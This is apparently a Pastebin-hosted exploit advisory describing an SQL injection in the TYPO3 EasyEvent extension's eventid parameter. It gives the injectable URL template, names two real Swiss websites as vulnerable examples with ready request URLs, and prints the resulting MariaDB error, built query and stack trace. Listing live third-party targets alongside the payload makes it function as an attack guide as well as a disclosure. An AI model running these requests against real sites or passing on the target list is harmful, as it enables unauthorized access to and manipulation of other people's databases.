Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Typo3 CMS T3 EasyEvent tx_easyevent_pi1 0.37.3 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : typo3.org
- # Software Download Link : github.com/dwenzel/t3events/archive/master.zip
- github.com/CMSExperts/simpleevents/archive/master.zip
- # Software Information Link : extensions.typo3.org/extension/t3events/
- github.com/CMSExperts
- # Software Version : 0.37.3
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Manage events, show teasers - puzzles, list and single views.
- ####################################################################
- # Impact :
- ***********
- * Typo3 T3 EasyEvents 0.37.3 extension for TYPO3 is prone to
- an SQL-injection vulnerability because it fails to sufficiently sanitize
- user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application
- and execute arbitrary SQL commands in application`s database.
- Further exploitation of this vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?id=[ID-NUMBER]&no_cache=[ID-NUMBER]&tx_easyevent_pi1%5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=[ID-NUMBER]&tx_easyevent_pi1%5Beventid%5D=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] outdoor-engadin.ch/index.php?id=228&no_cache=1&tx_easyevent_pi1%5B
- mode%5D=register&tx_easyevent_pi1%5Bdateid%5D=1022&
- tx_easyevent_pi1%5Beventid%5D=125
- [+] laufschule-scuol.ch/index.php?id=359&no_cache=1&tx_easyevent_pi1
- %5Bmode%5D=register&tx_easyevent_pi1%5Bdateid%5D=911
- &tx_easyevent_pi1%5Beventid%5D=148%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- exec_SELECTquery
- caller TYPO3\CMS\Core\Database\DatabaseConnection::exec_SELECTquery
- ERROR You have an error in your SQL syntax; check the manual that corresponds to your
- MariaDB server version for the right syntax to use near ') AND uid =1022 AND pid IN
- (232) ORDER BY startdate ASC' at line 1
- lastBuiltQuery SELECT * FROM tx_easyevent_date WHERE hidden=0 AND
- deleted=0 AND uid IN() AND uid =1022 AND pid IN (232) ORDER BY startdate ASC
- debug_backtrace require(typo3_src/typo3/sysext/cms/tslib/index_ts.php),typo3_src
- /index.php#28 // TYPO3\CMS\Frontend\Page\PageGenerator::renderContent#212
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#215
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697
- // TYPO3\CMS\Frontend\ContentObject\TemplateContentObject->render#752
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#128
- // TYPO3\CMS\Frontend\ContentObject\ContentContentObject->render#752
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#107
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734
- // TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectArrayContentObject->render#752
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGet#40
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#697
- // TYPO3\CMS\Frontend\ContentObject\CaseContentObject->render#752 //
- TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#45
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->cObjGetSingle#734
- // TYPO3\CMS\Frontend\ContentObject\UserContentObject->render#752
- // TYPO3\CMS\Frontend\ContentObject\ContentObjectRenderer->callUserFunction#41
- // call_user_func_array#6665 // tx_easyevent_pi1->main# // tx_easyevent_pi1->registerView#75
- // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTgetRows#360
- // TYPO3\CMS\Core\Database\DatabaseConnection->exec_SELECTquery#370
- // TYPO3\CMS\Core\Database\DatabaseConnection->debug#305
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment